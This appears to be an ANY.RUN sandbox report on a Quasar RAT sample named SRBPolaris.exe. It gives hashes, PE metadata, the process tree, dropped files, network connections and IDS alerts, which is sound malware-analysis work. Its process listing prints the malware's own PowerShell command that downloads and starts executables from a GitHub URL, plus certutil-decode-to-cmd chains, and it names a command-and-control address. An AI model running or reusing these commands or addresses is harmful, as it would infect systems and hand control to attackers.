analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

SRBPolaris.exe

Full analysis: https://app.any.run/tasks/8ecac9b9-a002-4d35-aec8-6e52ab14cae0
Verdict: Malicious activity
Threats:

Quasar is a very popular RAT in the world thanks to its code being available in open-source. This malware can be used to control the victim’s computer remotely.

Analysis date: November 29, 2020, 15:49:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
autoit
evasion
trojan
rat
quasar
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

3AFFF85A45303658EDA635F50DE07667

SHA1:

705F08FA6901C050125D4919CF2686F465162347

SHA256:

1C5E90E974735C3E903D0923A1CD4133FB45E44A9C99043D8CDE1D7FD8562110

SSDEEP:

49152:KKEgmgN2xFg6gqFV06KCPtZFrmI8e3tjR+uCS+ysZShLz7f/+bMnEPUnFOrTJ:+gN2Tgw0bSZFrmCn+uCSkGzDjVM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • QZXm.exe (PID: 3920)
      • winlogon.com (PID: 2736)
      • winlogon.com (PID: 756)
    • Runs app for hidden code execution

      • cmd.exe (PID: 3336)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2936)
    • Writes to a start menu file

      • winlogon.com (PID: 756)
    • QUASAR was detected

      • RegAsm.exe (PID: 2464)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • SRBPolaris.exe (PID: 2620)
    • Starts CertUtil for decode files

      • cmd.exe (PID: 2936)
      • cmd.exe (PID: 3336)
    • Creates files in the user directory

      • powershell.exe (PID: 1452)
      • powershell.exe (PID: 3200)
      • winlogon.com (PID: 756)
      • RegAsm.exe (PID: 2464)
    • Drop AutoIt3 executable file

      • cmd.exe (PID: 2936)
      • winlogon.com (PID: 756)
    • Application launched itself

      • cmd.exe (PID: 3336)
      • winlogon.com (PID: 2736)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3336)
      • QZXm.exe (PID: 3920)
    • Starts application with an unusual extension

      • cmd.exe (PID: 2936)
      • winlogon.com (PID: 2736)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 2936)
      • winlogon.com (PID: 756)
    • Checks for external IP

      • RegAsm.exe (PID: 2464)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • certutil.exe (PID: 3696)
      • winlogon.com (PID: 756)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

OriginalFileName: Put Line.exe
InternalName: Put Line
ProductVersion: 50.61.712
FileVersion: 50.61.712
ProductName: Put Line Software
LegalTrademarks: Put Line Software
LegalCopyright: Put Line Software
FileDescription: Put Line Software
CompanyName: Put Line Software
Comments: Put Line Software
CharacterSet: Unicode
LanguageCode: German
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x0000
ProductVersionNumber: 50.61.71.2
FileVersionNumber: 50.61.71.2
Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: 6.3
OSVersion: 6.3
EntryPoint: 0x69d0
UninitializedDataSize: -
InitializedDataSize: 3173888
CodeSize: 27136
LinkerVersion: 11
PEType: PE32
TimeStamp: 2014:10:31 04:28:47+01:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 31-Oct-2014 03:28:47
Detected languages:
  • English - United States
  • German - Germany
  • Russian - Russia
Debug artifacts:
  • wextract.pdb
Comments: Put Line Software
CompanyName: Put Line Software
FileDescription: Put Line Software
LegalCopyright: Put Line Software
LegalTrademarks: Put Line Software
ProductName: Put Line Software
FileVersion: 50.61.712
ProductVersion: 50.61.712
InternalName: Put Line
OriginalFilename: Put Line.exe

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000F0

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 5
Time date stamp: 31-Oct-2014 03:28:47
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x00006964
0x00006A00
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.35038
.data
0x00008000
0x00001A8C
0x00000400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3.17593
.idata
0x0000A000
0x0000107C
0x00001200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.04714
.rsrc
0x0000C000
0x00304DD7
0x00304E00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
7.99235
.reloc
0x00311000
0x000008C0
0x00000A00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
6.37329

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.05393
1511
Latin 1 / Western European
English - United States
RT_MANIFEST
2
3.15864
744
Latin 1 / Western European
English - United States
RT_ICON
3
3.07737
488
Latin 1 / Western European
English - United States
RT_ICON
4
3.50949
296
Latin 1 / Western European
English - United States
RT_ICON
5
5.56662
3752
Latin 1 / Western European
English - United States
RT_ICON
6
5.94251
2216
Latin 1 / Western European
English - United States
RT_ICON
7
5.99361
1736
Latin 1 / Western European
English - United States
RT_ICON
8
3.37828
1384
Latin 1 / Western European
English - United States
RT_ICON
9
7.98515
55762
Latin 1 / Western European
English - United States
RT_ICON
10
5.33023
9640
Latin 1 / Western European
English - United States
RT_ICON

Imports

ADVAPI32.dll
COMCTL32.dll
Cabinet.dll
GDI32.dll
KERNEL32.dll
USER32.dll
VERSION.dll
msvcrt.dll
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
14
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start srbpolaris.exe no specs powershell.exe no specs powershell.exe no specs qzxm.exe no specs cmd.exe no specs cmd.exe no specs certutil.exe no specs cmd.exe ping.exe no specs certutil.exe no specs winlogon.com no specs ping.exe no specs winlogon.com #QUASAR regasm.exe

Process information

PID
CMD
Path
Indicators
Parent process
2620"C:\Users\admin\AppData\Local\Temp\SRBPolaris.exe" C:\Users\admin\AppData\Local\Temp\SRBPolaris.exeexplorer.exe
User:
admin
Company:
Put Line Software
Integrity Level:
MEDIUM
Description:
Put Line Software
Exit code:
0
Version:
50.61.712
3200powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/f926/f/main/bild4.exe,https://raw.githubusercontent.com/f926/f/main/SRBPolaris.exe -Destination QZXm.exe,Qk.exe;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSRBPolaris.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1452powershell -command Start-Process QZXm.exe; Start-Process Qk.exe;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSRBPolaris.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3920"C:\Users\admin\AppData\Local\Temp\IXP000.TMP\QZXm.exe" C:\Users\admin\AppData\Local\Temp\IXP000.TMP\QZXm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Hma11 Lwyoncd Tuabkmogmj
Exit code:
0
Version:
4.7.9326.03483 (krfzbzq_fmc.101045-8338)
2504cmd /c nHqaWbzC:\Windows\system32\cmd.exeQZXm.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3336cmd /c certutil -decode 39-99 6-1 & cmd < 6-1C:\Windows\system32\cmd.exeQZXm.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2036certutil -decode 39-99 6-1 C:\Windows\system32\certutil.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2936cmd C:\Windows\system32\cmd.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3220ping -n 1 VdCiOMe.VdCiOMeC:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3696certutil -decode 8-28 iC:\Windows\system32\certutil.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
900
Read events
774
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
10
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
3200powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q2VVKDNJQ3X5U7R78L0E.temp
MD5:
SHA256:
1452powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FUKGDBBZ16O27DLRGUWP.temp
MD5:
SHA256:
2620SRBPolaris.exeC:\Users\admin\AppData\Local\Temp\IXP000.TMP\mSoen.dattext
MD5:D4B94C1EAE4B8A7E379A8C1BBDE895E5
SHA256:6C7F53B9E765B61AD6725571B7AEA999524371E811C929E192D602427B016EDE
756winlogon.comC:\Users\admin\AppData\Roaming\OzrOnORARl\xsxQUOYDHS.jstext
MD5:492F12D91A2CB3911D2BEE451259BA43
SHA256:29170E62129DBF1B4370F45C1D890909123F4F60D2ACC7FFC6CFCB024200D01E
3696certutil.exeC:\Users\admin\AppData\Local\Temp\IXP001.TMP\itext
MD5:3A42A9377900CDE0A04212DF6E45A37C
SHA256:B71F669CC117DBE100FEC339CF0BCF4B930B672D00D37FCCF43BC934B5E1B10F
3920QZXm.exeC:\Users\admin\AppData\Local\Temp\IXP001.TMP\70-6image
MD5:6BA8E5615AB5CA00BDBEC5125D88EECC
SHA256:46B8249FFDE2291F97487AC961E3F274AF76505841D2F4B8269E2A3960C7614F
1452powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF145080.TMPbinary
MD5:8A05551124C6BDB2904F636A481BD6DC
SHA256:17F84075E9B6C27B21B0AB5C00A7D8AA84BBF291764A231BFB72DA223035E900
2036certutil.exeC:\Users\admin\AppData\Local\Temp\IXP001.TMP\6-1text
MD5:C2169F8ACE5F3E6E72038878BE00B992
SHA256:1CAA1ABFF6F5CF942C7373C690CECF4F27B5DB2CC7C6E165216BC9BDAE6FBA7E
3920QZXm.exeC:\Users\admin\AppData\Local\Temp\IXP001.TMP\23-0binary
MD5:AF6DCF0BAA4BE3B4371AB6F8159EB25F
SHA256:6E4E2F0D4F71C73E75C1E918E3C60806B802B7121CFB5959945624FE3B60EE05
2620SRBPolaris.exeC:\Users\admin\AppData\Local\Temp\IXP000.TMP\DKEpbinary
MD5:E47246A50C3A2507D2BFD3ECD2689021
SHA256:E7F89C050A758BE7B5E0E2D9A24C99A9A30A7D596791C95B3CE4C6C0C12D0CDD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2464
RegAsm.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/
unknown
text
288 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2464
RegAsm.exe
208.95.112.1:80
ip-api.com
IBURST
malicious
151.101.0.133:443
raw.githubusercontent.com
Fastly
US
malicious
2464
RegAsm.exe
94.242.224.249:222
root SA
LU
malicious

DNS requests

Domain
IP
Reputation
raw.githubusercontent.com
  • 151.101.0.133
  • 151.101.192.133
  • 151.101.64.133
  • 151.101.128.133
shared
VdCiOMe.VdCiOMe
unknown
yrNmYmLHuXeSriJvzdiRf.yrNmYmLHuXeSriJvzdiRf
unknown
ip-api.com
  • 208.95.112.1
shared

Threats

PID
Process
Class
Message
2464
RegAsm.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup ip-api.com
2464
RegAsm.exe
Potential Corporate Privacy Violation
AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
2464
RegAsm.exe
A Network Trojan was detected
REMOTE [PTsecurity] Quasar.RAT IP Lookup
2464
RegAsm.exe
A Network Trojan was detected
REMOTE [PTsecurity] Quasar
1 ETPRO signatures available at the full report
No debug info